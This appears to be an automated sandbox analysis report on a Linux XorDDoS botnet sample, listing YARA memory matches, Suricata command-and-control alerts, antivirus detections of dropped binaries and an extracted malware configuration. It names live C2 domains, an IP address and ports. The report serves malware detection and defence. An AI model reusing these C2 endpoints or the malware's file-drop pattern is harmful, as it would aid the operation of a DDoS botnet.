Process Memory Space: UDMp3dZ7nc.elf PID: 6260	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6260	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6262	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6262	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6263	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6263	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x898:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x959:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6264	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6264	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x105e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x111f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6293	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6293	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x210f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21d0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6296	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6296	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6298	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6298	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xdf1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xeb2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6301	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6301	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6303	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6303	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1886:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1947:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6311	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6311	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2057:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2118:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6314	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6314	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1df0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1eb1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6316	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6316	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x210f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21d0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6319	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6319	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6322	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6322	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd22:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xde3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6328	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6328	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x210f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21d0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6331	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6331	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1886:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1947:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6333	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6333	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x194f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1a10:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6335	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6335	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1df6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1eb7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6338	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6338	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1047:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1108:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6364	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6364	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6367	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6367	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xdeb:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xeac:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6369	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6369	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x204c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x210d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6372	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6372	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x94a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa0b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6375	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6375	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6381	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6381	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6386	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6386	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xc69:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xd2a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6388	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6388	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6391	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6391	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6394	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6394	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1bab:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1c6c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6400	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6400	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6403	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6403	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd28:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xde9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6405	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6405	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x204c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x210d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6408	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6408	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6410	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6410	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xdeb:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xeac:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6417	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6417	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x94a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa0b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6420	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6420	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x94a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa0b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6422	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6422	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6425	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6425	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x110a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x11cb:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6428	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6428	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6435	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6435	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2122:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21e3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6438	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6438	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x212a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21eb:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6440	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6440	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x188c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x194d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6443	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6443	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1110:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x11d1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6446	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6446	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1c74:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1d35:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6452	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6452	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x211b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21dc:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6455	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6455	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6457	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6457	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1955:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1a16:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6460	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6460	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6463	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6463	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2115:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21d6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6471	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6471	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2115:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21d6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6474	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6474	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x204c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x210d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6476	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6476	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x211b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21dc:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6479	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6479	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1bab:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1c6c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6482	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6482	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1955:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1a16:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6488	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6488	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xdf1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xeb2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6491	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6491	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1d2d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1dee:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6493	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6493	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1c74:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1d35:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6496	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6496	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6498	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6498	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6505	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6505	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1d33:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1df4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6508	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6508	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1dfd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1ebe:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6510	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6510	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd22:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xde3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6513	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6513	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: UDMp3dZ7nc.elf PID: 6516	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: UDMp3dZ7nc.elf PID: 6516	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Click to see the 471 entries

Suricata Signatures

ET MALWARE DDoS.XOR Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T15:27:53.413618+0100	2020381	1	Malware Command and Control Activity Detected	192.168.2.23	55858	137.175.90.213	1522	TCP
2025-01-03T15:27:53.472788+0100	2020381	1	Malware Command and Control Activity Detected	192.168.2.23	55858	137.175.90.213	1522	TCP

ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T15:27:53.413618+0100	2021326	1	A Network Trojan was detected	192.168.2.23	51452	8.8.8.8	53	UDP
2025-01-03T15:27:53.421515+0100	2021326	1	A Network Trojan was detected	192.168.2.23	39078	8.8.4.4	53	UDP
2025-01-03T15:27:53.433409+0100	2021326	1	A Network Trojan was detected	192.168.2.23	33405	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: UDMp3dZ7nc.elf

Avira: detected

Antivirus detection for dropped file

Source: /usr/lib/libudev.so	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/bgoiqqymph	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/dthtwwmqvu	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/eqoogeqyds	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/otlzwyqefc	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/vnihfmehfy	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/ksagqhmoao	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/oigyzaiygp	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/sosfbbrzmx	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/qxzsiorokf	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/uhjkqkcgma	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/uzqdvpyngy	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/snluqxjnyb	Avira: detection malicious, Label: LINUX/Xorddos.misjj
Source: /usr/bin/gphlkawhxw	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/jeyjdycnpv	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/wutujskjnm	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b

Found malware configuration

Source: UDMp3dZ7nc.elf

Malware Configuration Extractor: XorDDoS {"C2 list": ["http://aa.hostasa.org/config.rar\u0000tat456.com:1522", "ppp.gggatat456.com:1522"]}

Multi AV Scanner detection for submitted file

Source: UDMp3dZ7nc.elf	Virustotal: Detection: 65%			Perma Link
Source: UDMp3dZ7nc.elf	ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: /usr/lib/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/bgoiqqymph	Joe Sandbox ML: detected
Source: /usr/bin/dthtwwmqvu	Joe Sandbox ML: detected
Source: /usr/bin/eqoogeqyds	Joe Sandbox ML: detected
Source: /usr/bin/otlzwyqefc	Joe Sandbox ML: detected
Source: /usr/bin/vnihfmehfy	Joe Sandbox ML: detected
Source: /usr/bin/ksagqhmoao	Joe Sandbox ML: detected
Source: /usr/bin/oigyzaiygp	Joe Sandbox ML: detected
Source: /usr/bin/sosfbbrzmx	Joe Sandbox ML: detected
Source: /usr/bin/qxzsiorokf	Joe Sandbox ML: detected
Source: /usr/bin/uhjkqkcgma	Joe Sandbox ML: detected
Source: /usr/bin/uzqdvpyngy	Joe Sandbox ML: detected
Source: /usr/bin/snluqxjnyb	Joe Sandbox ML: detected
Source: /usr/bin/gphlkawhxw	Joe Sandbox ML: detected
Source: /usr/bin/jeyjdycnpv	Joe Sandbox ML: detected
Source: /usr/bin/wutujskjnm	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: UDMp3dZ7nc.elf

Joe Sandbox ML: detected

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Networking

Suricata IDS alerts for network traffic

